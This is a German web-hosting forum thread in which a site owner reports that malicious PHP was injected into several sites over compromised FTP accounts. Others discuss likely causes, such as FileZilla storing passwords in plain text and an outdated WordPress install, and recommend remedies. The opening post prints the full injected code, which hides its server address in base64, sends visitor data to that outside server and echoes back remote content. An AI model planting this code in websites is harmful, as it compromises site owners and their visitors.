Seite 1 von 2 1 2 LetzteLetzte
Ergebnis 1 bis 15 von 22

Thema: FTP Zugang missbraucht / Filezilla

Reseller

FTP Zugang missbraucht / Filezilla

Hallo,

ich habe zufällig festgestellt, dass auf mehreren meiner Webseiten über einen FTP upload der unten genannte Schadcode in mehrere PHP Skripte eingefügt wurde (meist index.php).

Da die Zugangsdaten im Filezilla (für OSX) abgelegt waren, vermute ich, dass die Kennwörter über meinen Mac abgegriffen wurden. Allerdings findet mein Virenscanner (Kaspersky für Mac) keinerlei Infektion. Sehr Ihr evtl. noch eine andere Möglichkeit, wie die Zugangsdaten abgegriffen werden konnten?
    PHP-Code:
    <?php
    if (!isset($sRetry))
    {
    global 
    $sRetry;
    $sRetry 1;

// This code use for global bot statistic

$sUserAgent strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot

$stCurlHandle NULL;

$stCurlLink "";
        if((
    strstr($sUserAgent'google') == false)&&(strstr($sUserAgent'yahoo') == false)&&(strstr($sUserAgent'baidu') == false)&&(strstr($sUserAgent'msn') == false)&&(strstr($sUserAgent'opera') == false)&&(strstr($sUserAgent'chrome') == false)&&(strstr($sUserAgent'bing') == false)&&(strstr($sUserAgent'safari') == false)&&(strstr($sUserAgent'bot') == false)) // Bot comes

{
            if(isset(
    $_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics            

$stCurlLink base64_decode'aHR0cDovL2JvdHN0YXRpc3RpY3VwZGF0ZS5jb20vc3RhdC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
                @
    $stCurlHandle curl_init$stCurlLink ); 
        }
        } 
    if ( 
    $stCurlHandle !== NULL )
    {

curl_setopt($stCurlHandleCURLOPT_RETURNTRANSFER1);

curl_setopt($stCurlHandleCURLOPT_TIMEOUT12);

$sResult = @curl_exec($stCurlHandle); 
        if (
    $sResult[0]=="O"
         {
    $sResult[0]=" ";
          echo 
    $sResult// Statistic code end

}

curl_close($stCurlHandle); 
    }
    }
    ?>

Gast

AW: FTP Zugang missbraucht / Filezilla

Hi,

bei PHP in Verbindung mit Hacks... fällt mir als Erstes Wordpress ein!

Wird eventuell eine veraltete Wordpress Version (und/oder Wordpress Plugins) noch verwendet?

Hier wurde ja schon oft diskutiert, wie unsicher FileZilla die Passwörter ablegt, aber ich denke dass die jemand lokal von deinem Rechner ausgelesen hat -> ist eher unwahrscheinlicher, als dass unsichere PHP-Skripte verwendet wurden.

Stefan
    Geändert von Stefan S. (05.04.2012 um 23:26 Uhr) Grund: Plugins added

Reseller

Hi Stefan,

vielen Dank für Deine Antwort! Ich hatte auch zunächst gedacht, dass so etwas wahrscheinlicher sei. Allerdings sind die Änderungen über vier verschiedene FTP Zugänge durchgeführt worden (zumindest tauchen die Änderungen in den FTP logs auf). Zugegeben läuft unter einem Zugang eine veraltete wordpress Version, aber die FTP Zugänge sind durch quotas getrennt und ich kann mir nicht erklären, wie über wordpress die Zugangsdaten ausgelesen werden können?

Viele Grüße,
    Max

Gast

Hi Max,

sind die Zugangsdaten vom FTP zufällig in der wp-config.php gespeichert worden? Bzw. steht was in der *options- Tabelle im Feld ftp_credentials in der Datenbank?

Wenn ein Angreifer Zugriff auf die wp-config hatte und/oder auf die Datenbank, dann konnte er die FTP-Daten leicht auslesen.

Stefan
    Geändert von Stefan S. (05.04.2012 um 23:57 Uhr)

Gast

Zitat Zitat von max81 Beitrag anzeigen
    Sehr Ihr evtl. noch eine andere Möglichkeit, wie die Zugangsdaten abgegriffen werden konnten?
    - Notebook und mal nen offenes W-Lan genutzt
    - FTP-Passwort per Dictionary Angriff erraten
    - FTP-Zugang weitergegeben, Infektion bei Dienstleister / Bekannten

Communityservice Avatar von Nils Dornblut

Hallo max81,

sie können sich gerne an die Technik wenden und wir schauen uns das einmal an. Ändern Sie bitte in jedem Fall alle Passwörter (Kundenmenü, FTP, MySQL, ggf. SSH und zur Sicherheit auch E-Mail-Accounts).

Mit freundlichen Grüßen

Nils Dornblut
    Communityservice

Kunde

Ich hatte vor einige Jahre das gleiche Problem. Ohne Wordpress aber mit Filezilla.
    Die Kinder hatten ein Spiel installiert welches offenbar die filezille konfiguration ausgelesen hatte. Das war auf einem Rechner den ich zuvor benutzt hatte und an den Kindern weiter gegeben hatte. Nur die Websites die auf diesem Rechner mit Filezille zugänglich waren, waren auch betroffen.
    Empfehlung:
    - Anderer Rechner nehmen
    - neue ftp Passworter einrichten
    - anderer FTP Client nehmen (muss icht unbedingt aber filezille ist anfällig)
    - Shadcode entfernen
    - Mit Google webmaster tools websites erneut von google prüfen lassen
    - alter Rechner sauber kriegen (notfalls neu installieren)
    Ernest

Gast

Man kann auch einfach die Passwörter nicht in Filezilla oder auf dem Computer ablegen (sondern im Kopf oder woanders irgendwo in der Nähe - nicht offen wenn das Büro auch von anderen genutzt wird).
    minikurier-sts MKSTS®

Kunde

Zitat Zitat von Bambär Beitrag anzeigen
    Man kann auch einfach die Passwörter nicht in Filezilla oder auf dem Computer ablegen (sondern im Kopf oder woanders irgendwo in der Nähe - nicht offen wenn das Büro auch von anderen genutzt wird).
    Im Kopf? Nööö, das geht wirklich nicht. ;-)
    Ich verwende jetzt das kostenlose netbeans als Editor und Projekt-Management. Hier ist der ftp-client mit integriert und dieser geht auch per sftp damit die Passwörter nicht in Klartext über das Internet gehen.

Gast

Auch Filezilla unterstützt SFTP. Ich sehe es halt als Schwachpunkt an wenn Passwörter (egal ob im Klartext oder verschlüsselt) auf dem Computer mit abgelegt werden. Aber es muß jeder selbst wissen wieviel Sicherheit ihn Bequemlichkeit wert ist.
    minikurier-sts MKSTS®

Kunde

Danke für den Hinweis - für Leute, die Filezilla mögen, jedoch sicherheitsbewusst denken, sei folgender Artikel empfohlen (FileZilla mit KeePass): http://ganz-sicher.net/blog/tutorial...en-passworter/

Reseller

Für diejenigen, die viel per FTP oder SFTP arbeiten, kann ich nur Winscp ( http://winscp.net/eng/docs/lang:de ) empfehlen. Da kann man die Verschlüsselung der Passwörter per Default festlegen.

Gruß,
    Michael

Kunde

Hallo,

ich kann mich nur anschließen: Finger weg von Filezilla! Mein FTP-Zugang wurde auch missbraucht. Auf Filezilla wäre ich wohl nie gekommen. Aber meine Website wurde immer und immer wieder gehackt, obwohl ich ständig mein Passwort geändert und den Webspace bereinigt hatte. Auf Filezilla bin ich nur durch Zufall gekommen, als ich aus ganz anderen Gründen eine Konfigurationsdatei geöffnet hatte... da staunte ich nicht schlecht, als da alle meine Zugangsdaten im Klartext drin standen . Denn die speichert Filezilla bei jedem Verbindungsaufbau. Siehe hier: http://mrcrowley.de/testbericht/so-u...ist-filezilla/ (Video von mir).

Also Finger weg von Filezilla! WinSCP kann ich auch empfehlen.

VG, Crowley

Gast

Wobei Filezilla da wohl weniger für kann. Der Schwachpunkt liegt da wohl eher beim infizierten Rechner worauf Filezilla ist...und daran daß die Passwörter lokal gespeichert werden...
    minikurier-sts MKSTS®

Forenexperte² (Reseller) Avatar von Enigma

Zitat Zitat von Bambär Beitrag anzeigen
    Wobei Filezilla da wohl weniger für kann. Der Schwachpunkt liegt da wohl eher beim infizierten Rechner worauf Filezilla ist...und daran daß die Passwörter lokal gespeichert werden...
    Na ja, Passwörter im Klartext zu speichern ist schon ein ziemlicher Hammer... Klar ist der Rechner selbst kompromittiert, was anderweitig verhindert werden sollte, aber da man damit heutzutage rechnen muss, sind weitere "Schutzschichten" ein absolutes Muss. Da haben die Entwickler schlicht gepennt.

Gruß,
    Jan
    Two hours of trial and error can save ten minutes of manual reading.

Seite 1 von 2 1 2 LetzteLetzte